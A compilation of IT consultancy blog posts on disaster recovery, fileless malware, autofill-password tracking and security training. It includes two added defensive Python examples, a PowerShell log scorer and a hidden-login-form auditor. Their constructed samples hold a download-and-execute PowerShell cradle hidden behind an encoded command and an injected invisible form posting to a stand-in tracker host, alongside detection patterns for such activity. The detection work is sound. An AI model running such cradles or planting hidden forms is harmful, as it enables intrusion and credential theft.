Disaster recovery audit fail: A few lessons

When talking about disaster recovery plans (DRPs), it’s best to illustrate with real-world scenarios. They offer concrete examples of successes and failures, and you can learn a lot from them. Here’s an example of a DRP audit and the lessons it offers.

Hosting certain types of data and managing a government network legally bind you to maintain a DRP. An audit of the Michigan Department of Technology and Budget turned up several failures, and those failures amount to a trove of helpful tips for small- and medium-sized businesses attempting to create a bulletproof disaster recovery plan.

Update and test your plan frequently

What was one of the first and most obvious failures of the department’s DRP? It didn’t include plans to restore an essential piece of infrastructure — the department’s intranet. Without it, employees are unable to complete even the most basic tasks.

The reason for the oversight? The last time the plan was updated was in 2011, leaving out more than six years of IT advancements. If annual revisions sound like too much work, just consider all of the IT upgrades and improvements you’ve made in this year alone. If they’re not accounted for in your plan, you’re destined to fail.

Keep your DRP in an easy-to-find location

It may seem a bit ironic that the best way to store your top-of-the-line business continuity solution is in a binder, but the Michigan Department of Technology and Budget learned the hard way that the alternatives don’t work. Auditors found the DRP stored on the same network it was meant to restore, which means that if something had happened to the network, the plan would have been totally inaccessible.

Your company would do well to store electronic copies on more than one network in addition to physical copies around the office and off-site.

Always prepare for a doomsday scenario

The government office made suitable plans for restoring the local area network (LAN), but beyond that, there was no way for employees to get back to work within the 24-hour recovery time objective.

Your organization needs to be prepared for the possibility that there may not be a LAN to go back to. Cloud backups and software are the best way to keep everything up and running when your office is flooded or crushed beneath a pile of rubble.

Your DRP is more than just a pesky legal requirement. It’s the insurance plan that will keep you in business when disaster strikes. Our professionals know the importance of combining both academic and real-world resources to make your plan airtight when either auditors or blizzards strike. Message us today about bringing that expertise to your business.


A closer look at fileless malware

To avoid detection by antimalware programs, cybercriminals are increasingly abusing legitimate software tools and programs already present on systems to steal data or corrupt its integrity. They use fileless malware to hijack trusted applications and run code that blends in with normal network traffic or IT/system administration tasks while leaving fewer footprints. Ultimately, your business could be at risk. Let’s see why.

What is fileless malware?

Fileless malware resides in random access memory (RAM) instead of on the hard drive. In a typical fileless infection, payloads are injected into the memory of existing software or applications by running scripts within whitelisted or authenticated applications such as PowerShell. PowerShell is designed to automate system administration tasks, such as listing all USB devices, drives, and services installed on the system, scheduling a series of commands, or terminating processes, as Task Manager does.

Because there are no files to trace, fileless malware escapes detection by most antimalware programs, especially those that rely on databases of known threats. Furthermore, most automated sensors cannot recognize illicit scripts, and cybersecurity analysts trained to identify them usually have a difficult time establishing where to start looking. Fileless malware is far less visible than traditional malware. It employs a variety of techniques to stay persistent, and it can adversely affect the integrity of a business’s processes and the infrastructure that runs them.
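The paragraphs above describe why PowerShell-based fileless activity is hard to spot: nothing lands on disk, and the script looks like administration work. What defenders do have is the script text itself, once Windows script block logging (event ID 4104 in the PowerShell Operational log) or process command-line logging is enabled. The following is an added example, not code from the original post, of a small scorer that reads such log lines, decodes `-EncodedCommand` payloads so the same checks run on the hidden script, and flags lines where several suspicious traits occur together. The log lines, their `host=... ps=...` format and the `example.invalid` address are constructed for the demo.

```python
"""Added example (not from the original post): score PowerShell activity found
in logs for traits that fileless, PowerShell-based intrusions tend to share.
Works on script block text (event ID 4104) or on process command lines.
All sample log lines below are constructed."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# (indicator name, pattern). Matching is case-insensitive. One of these alone
# is routine administration; several on one line is what we want to see.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("web_download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I)),
    ("noprofile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("reflection_load", re.compile(r"\[reflection\.assembly\]::load|frombase64string", re.I)),
]


@dataclass
class Finding:
    line_no: int
    indicators: List[str]
    decoded: Optional[str]  # the -EncodedCommand payload, if one was present


def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell's -EncodedCommand carries base64 of UTF-16LE text. Return that
    text, or None if the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_text(text: str) -> Tuple[List[str], Optional[str]]:
    """Return the indicator names hit by the text plus any decoded payload.
    The decoded payload is scanned with the same patterns, so encoding the
    script buys the attacker nothing against this check."""
    hits: List[str] = []
    decoded: Optional[str] = None
    for name, pattern in INDICATORS:
        match = pattern.search(text)
        if match:
            hits.append(name)
            if name == "encoded_command":
                decoded = decode_encoded_command(match.group(1))
    if decoded:
        for name, pattern in INDICATORS:
            if name not in hits and pattern.search(decoded):
                hits.append(name)
    return hits, decoded


def scan_log(lines: List[str], threshold: int = 2) -> List[Finding]:
    """Flag lines whose indicator count reaches the threshold (a tuning knob)."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        hits, decoded = scan_text(line)
        if len(hits) >= threshold:
            findings.append(Finding(line_no, hits, decoded))
    return findings


def _encode_command(script: str) -> str:
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log: "<time> host=<name> ps=<command line or script block>".
# Line 3 is a staged download cradle hidden behind -enc; line 4 is a legitimate
# backup job that nevertheless trips two indicators.
SAMPLE_LOG = [
    "2018-07-12T09:14:03Z host=WS01 ps=Get-Service | Where-Object { $_.Status -eq 'Running' }",
    "2018-07-12T09:15:11Z host=WS01 ps=powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Logs\"",
    "2018-07-12T09:16:40Z host=WS07 ps=powershell.exe -nop -w hidden -ep bypass -enc "
    + _encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"),
    "2018-07-12T09:17:02Z host=WS02 ps=powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding.line_no}: {', '.join(finding.indicators)}")
        if finding.decoded:
            print(f"  decoded payload: {finding.decoded}")
```

Line 4 of the sample is the caveat: an administrator's scheduled backup with `-NoProfile -ExecutionPolicy Bypass` reaches the default threshold too, so a scorer like this is a triage aid that surfaces lines for a human, not a verdict, and the threshold and indicator list need tuning against what normal administration looks like in your own environment. None of it works unless script block logging is actually turned on, which is the first step.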

Fileless malware by the numbers

Cybersecurity firm Kaspersky Lab first discovered a type of fileless malware on its own network a couple of years ago. The final verdict was that it originated from the Stuxnet strain of state-sponsored cyber warfare. The high level of sophistication and government funding involved meant fileless malware was virtually nonexistent until the beginning of 2017.

In November 2016, attacks using fileless malware saw an uptick of 13%, according to a report. In the same quarter, attacks surged 33% compared to the first quarter. During the first quarter of 2017, PowerShell-related attacks were reported on more than 12,000 unique machines.

Kaspersky Lab uncovered over 140 infections across 40 different countries. Almost every instance of the fileless malware was found in financial institutions and worked towards obtaining login credentials. In the worst cases, infections had already gleaned enough information to allow cyberattackers to withdraw undisclosed sums of cash from ATMs.

In 2018, cybersecurity firm Trend Micro detected a rising trend of fileless threats throughout the first half of the year.

Is your business at risk?

It is unlikely your business would have been targeted in the earliest stages of this particular strain of malware, but it’s better to be safe than sorry. Businesses should practice defense in depth, implementing multilayered safeguards to reduce exposure and mitigate damage. But apart from cultivating a security-aware workforce, what actionable countermeasures can organizations take?

While your business might not be in immediate danger, you should employ solutions that analyze trends in behavior. It is also wise to invest in a managed service provider that offers 24/7 network monitoring, proper patches, and software updates. Call today to get started.

The dangers of autocomplete passwords

Hackers have found a new way to track you online. Aside from using advertisements and suggestions, they can now use autocomplete passwords to track you. Feeling insecure? Here are some ways to keep yourself out of harm’s way.

Why auto-fill passwords are so dangerous

As of December 2018, there are 4.1 billion internet users in the world. This means users have to create dozens of passwords, either to protect their accounts or simply to meet the password-creation requirements of the platforms they use. Unfortunately, only 20% of US internet users have different passwords for their multiple online accounts.

Certain web browsers have integrated a mechanism that enters usernames and passwords into a web form automatically. Likewise, password manager applications have made it easy to access login credentials. But these aren’t completely safe.

Tricking a browser or password manager into giving up this saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do many people know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to track the sites that users visit. They’ve made no attempts to steal passwords, but security professionals said it wouldn’t have been hard for them to do so. AdThink and OnAudience simply tracked people based on the usernames in hidden auto-fill forms and sold the information they gathered to advertisers.
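Both uses of the trick described above, credential theft and the AdThink/OnAudience tracking, depend on the same thing: a username or password input that the browser is willing to autofill but the visitor never sees. A site owner can check their own pages for that pattern. The following is an added example, not code from the original post, of a static audit that walks page markup with Python's standard `html.parser`, keeps track of which ancestors are hidden by inline style or the `hidden` attribute, and reports every credential-looking input that is invisible for one of those reasons. The sample page and the `tracker.example` address are constructed; the class and function names are this example's own.

```python
"""Added example (not from the original post): flag username/password inputs
that a browser would autofill but a visitor cannot see. This reads only markup
and inline styles; a form hidden through an external stylesheet needs a
rendered-DOM check (browser devtools or a headless browser) instead."""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

VOID_TAGS = {"input", "br", "img", "meta", "link", "hr", "area", "base", "col",
             "embed", "source", "wbr"}
# Inline-style tricks that make an element invisible while still part of the form.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}px", re.I)
# Names/ids that browsers and password managers treat as login fields.
CREDENTIAL_HINT = re.compile(r"user|login|email|pass|pwd", re.I)
CREDENTIAL_AUTOCOMPLETE = {"username", "email", "current-password", "new-password"}


@dataclass
class HiddenCredentialField:
    name: str
    input_type: str
    reason: str


def _is_hidden(attrs: Dict[str, Optional[str]]) -> Optional[str]:
    """Why an element is invisible according to its own attributes, or None."""
    if "hidden" in attrs:
        return "hidden attribute"
    if HIDDEN_STYLE.search(attrs.get("style") or ""):
        return "inline style"
    return None


def _is_credential_input(attrs: Dict[str, Optional[str]]) -> bool:
    if (attrs.get("type") or "text").lower() == "password":
        return True
    if (attrs.get("autocomplete") or "").lower() in CREDENTIAL_AUTOCOMPLETE:
        return True
    return bool(CREDENTIAL_HINT.search((attrs.get("name") or "") + " " + (attrs.get("id") or "")))


class HiddenFieldAuditor(HTMLParser):
    """Tracks open ancestors and their hidden-ness; checks each <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.stack: List[Tuple[str, Optional[str]]] = []  # (tag, hidden reason)
        self.findings: List[HiddenCredentialField] = []

    def handle_starttag(self, tag, attrs) -> None:
        attr_map = dict(attrs)
        if tag == "input":
            self._check_input(attr_map)
            return
        if tag not in VOID_TAGS:
            self.stack.append((tag, _is_hidden(attr_map)))

    def handle_endtag(self, tag) -> None:
        if tag in VOID_TAGS:
            return
        # Pop back to the matching open tag; tolerates sloppy, unclosed markup.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def _check_input(self, attrs: Dict[str, Optional[str]]) -> None:
        input_type = (attrs.get("type") or "text").lower()
        # type="hidden" inputs are never autofill targets; the trick uses
        # visually hidden text/password inputs, so only those matter here.
        if input_type == "hidden" or not _is_credential_input(attrs):
            return
        name = attrs.get("name") or attrs.get("id") or "?"
        reason = _is_hidden(attrs)
        if reason is None:
            for tag, why in reversed(self.stack):
                if why:
                    reason = f"hidden ancestor <{tag}> ({why})"
                    break
        if reason:
            self.findings.append(HiddenCredentialField(name, input_type, reason))


def audit_html(html: str) -> List[HiddenCredentialField]:
    parser = HiddenFieldAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a normal login form, a newsletter box, then an injected
# off-screen form and a transparent password field that should both be flagged.
SAMPLE_PAGE = """<!-- constructed sample page -->
<html><body>
<form action="/login" method="post">
  <input type="text" name="username" autocomplete="username">
  <input type="password" name="password" autocomplete="current-password">
  <input type="hidden" name="login_csrf" value="abc123">
  <button>Sign in</button>
</form>
<form action="/newsletter"><input type="email" name="email"></form>
<div style="position:absolute; left:-9999px; top:0">
  <form action="https://tracker.example/collect">
    <input type="text" name="username" autocomplete="username">
    <input type="password" name="password">
  </form>
</div>
<input type="password" name="pw_shadow" style="opacity:0">
</body></html>"""

if __name__ == "__main__":
    for f in audit_html(SAMPLE_PAGE):
        print(f"{f.input_type} input '{f.name}': {f.reason}")
```

The visible login form and the CSRF token pass, while the two inputs inside the off-screen `div` and the zero-opacity password field are reported. Because the check only sees inline styles, a form hidden by a class defined in a stylesheet slips past it; the reliable way to audit a live page is to inspect the rendered DOM, and the reliable way to avoid being a victim as a user is the browser setting described in the next section.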

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

This is just one small thing you can do to keep your accounts and the information they contain safe. For managed, 24×7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

Why end user training is critical to your association’s CyberSecurity

October is National CyberSecurity Awareness Month, and it’s a perfect time to review your association’s security procedures—starting with employee education. An organization could spend hundreds of thousands of dollars deploying top-notch CyberSecurity tools, but without proper training of end users, they’re useless.

Educating staff on the “why” of CyberSecurity is critical. Employees need to understand the potential risks of a cyber-attack—from financial damage to layoffs to a ruined reputation.

Many of you have heard the term “social engineering,” but you might not understand its meaning. Social engineering is one of the most common scams encountered by employees. This type of attack uses manipulation and human psychology to trick people into making bad decisions. But as a CFO or financial executive, what can you do to help?

Providing employees with real-world examples of social engineering is one of the best ways to educate and train them to spot these scams before they become a problem:

  • “Microsoft” calling because a machine isn’t updated
  • “IT department” calling to reset your password
  • Company’s “CEO” sends an email to the controller asking to wire funds
  • A USB flash drive is found on the floor

If your association doesn’t have the right CyberSecurity policies and procedures in place, hiring a professional can help you start building a protection program. By blending technology, training, and a common-sense setup, CFOs can lessen their organization’s chance of encountering a cyber-attack and being compromised.

The original article appeared in Association Trends.

Do you need a CIO?

(Hint: YES!)

What is the job of a CIO, exactly? Chief Information Officer. Isn’t that just IT?

Well, yes. And, no.

A CIO has many roles in an organization. IT is one role—understanding computer systems, networking, SaaS, security, standards, etc., has to be in a CIO’s wheelhouse. However, a CIO has to be able to understand and articulate the context of these systems. What do they do for our organization? How are they used? And most importantly, why are we using them?

CIOs manage IT resources and IT-related business resources. Policy preparation, strategic business planning, budgeting, resourcing, training, security, expenditures, damage control, project management—all come under the purview of a CIO, and that CIO has to be able to communicate in a human language to all sorts of people, technical and non-technical: staff, Board, vendors, executives, and members.

In essence, the CIO is the bridge between the technical and business aspects of an organization’s IT requirements. And, yes, you need one!

“Well, I don’t have anyone on staff who can fill that position,” you might say. There are alternatives to hiring an FTE CIO. Outsourcing the CIO function is a popular option. designDATA offers “fractional” CIO consulting services, bringing our consultants’ expertise and years of association management experience to the task on an ongoing retainer basis. We work with your organization to identify your IT-related business needs. Whether your IT questions are big or small, we can help you decide how best to achieve the results you want.

Contact us for more info.

Why Look for Trouble? Doing a Technology Gap Review

“But I’ve got managed IT services, a great help desk, and my servers are safely in the private cloud. Why would I need to do a Technology Gap Review?”

It’s a good question. And the answer is another question: now that you’ve got your infrastructure all taken care of with designDATA’s help, what about the 43 other pieces of software you’re using to manage your organization? Are they all serving your mission and supporting your goals?

A Technology Gap Review takes a look at how you do business using technology. Not which buttons you push, but what pieces of software you use and how you use them. Typically, after a review, you see surprises (or not!) such as:

  • Staff are not using the Association Management System (AMS) or CRM to its full functionality— probably because they haven’t been properly trained or retrained.
  • A lot of people have data important to the organization stored in spreadsheets—only.
  • Different departments are using different software to complete the same function, i.e., Constant Contact, Real Magnet, and MailChimp for broadcast emails— and you’re paying for all three.
  • Everybody has their own place to store documents outside the system, like Dropbox or OneDrive—which means the organization has no control over them.
  • Someone is manually creating invoices in Word because they can’t get what they need out of a system— and these are not tracked in any automated system until payment is received.

You may suspect all of the above and more. A Technology Gap Review gives you an opportunity to confirm this and discover other gaps. Steps in a review should include:

  • Interviews with staff in all functional areas of the organization.
  • Documentation of how business is conducted and what is being used to get the job done.
  • Documented full system inventory of what software the organization is using, how and why.

Once you know what you’re dealing with, you are in a better place to decide how to improve performance and function to support your organization’s mission.


designDATA offers Technology Gap Review and CIO Consulting to help your organization with this truly useful exercise. The designDATA Consulting Team is made up of former association/non-profit executives and managers who have been “in the trenches” and understand the unique challenges faced in the industry. We can help you with the process and documentation, and together we can construct a set of recommendations for your organization to move ahead with improvements to functionality.

Contact us today for more information, and be sure to ask how else your designDATA Consulting Team can help you with business management IT issues.

Cybersecurity and Today’s CFO

CFOs can no longer respond with “that’s not my department” when it comes to cybersecurity. In a recent article by Harvard Business Review, CFOs were outed for not taking an active role in their organization’s cybersecurity efforts. Today’s financial executive must focus on more than managing financial risk—they must become an engaged member of the security team.

Data breaches are extremely damaging, costing executives their jobs, destroying brands and causing vital information to be lost. CFOs need to start becoming more competent in cybersecurity methods and implementing practical solutions for keeping data safe and managing risk.

To start building a cybersecurity plan, schedule a free onsite consultation with us to discuss performing a penetration and vulnerability test for your organization. This assessment will help you identify holes in your defenses and uncover areas that hackers can exploit and access critical data. Using the results of these tests, we can work together to fix existing issues and create a cybersecurity plan that protects your people, processes and data.

This article was written for Association TRENDS.